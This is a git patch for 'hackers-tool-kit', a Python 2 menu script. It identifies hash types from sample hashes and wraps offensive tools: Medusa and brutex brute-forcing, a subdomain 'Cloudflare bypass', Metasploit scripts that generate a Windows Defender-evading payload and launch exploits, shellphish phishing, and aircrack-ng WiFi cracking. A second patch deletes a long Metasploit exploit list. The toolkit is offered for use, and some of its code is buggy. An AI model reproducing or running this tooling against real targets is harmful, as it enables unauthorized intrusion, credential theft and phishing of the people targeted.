hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + +#ABOUT ME / THE CREATOR START# +#----------------------------# +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +#--------------------------# +#ABOUT ME / THE CREATOR END# + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From f2a12c6711fef8c8d2eea998666bd1b8125b9037 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 6 Apr 2019 17:49:38 +0100 Subject: [PATCH 084/214] Delete exploits.txt --- tools/exploits.txt | 1858 -------------------------------------------- 1 file changed, 1858 deletions(-) delete mode 100644 tools/exploits.txt diff --git a/tools/exploits.txt b/tools/exploits.txt deleted file mode 100644 index 2b18721..0000000 --- a/tools/exploits.txt +++ /dev/null @@ -1,1858 +0,0 @@ -Exploits -======== - - Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- - aix/local/ibstat_path 2013-09-24 excellent Yes ibstat $PATH Privilege Escalation - aix/rpc_cmsd_opcode21 2009-10-07 great No AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow - aix/rpc_ttdbserverd_realpath 2009-06-17 great No ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) - android/adb/adb_server_exec 2016-01-01 excellent Yes Android ADB Debug Server Remote Payload Execution - android/browser/samsung_knox_smdm_url 2014-11-12 excellent No Samsung Galaxy KNOX Android Browser RCE - android/browser/stagefright_mp4_tx3g_64bit 2015-08-13 normal No Android Stagefright MP4 tx3g Integer Overflow - android/browser/webview_addjavascriptinterface 2012-12-21 excellent No Android Browser and WebView addJavascriptInterface Code Execution - android/fileformat/adobe_reader_pdf_js_interface 2014-04-13 good No Adobe Reader for Android addJavascriptInterface Exploit - android/local/futex_requeue 2014-05-03 excellent No Android 'Towelroot' Futex Requeue Kernel Exploit - android/local/put_user_vroot 2013-09-06 excellent No Android get_user/put_user Exploit - apple_ios/browser/safari_libtiff 2006-08-01 good No Apple iOS MobileSafari LibTIFF Buffer Overflow - apple_ios/browser/webkit_trident 2016-08-25 manual No WebKit not_number defineProperties UAF - apple_ios/email/mobilemail_libtiff 2006-08-01 good No Apple iOS 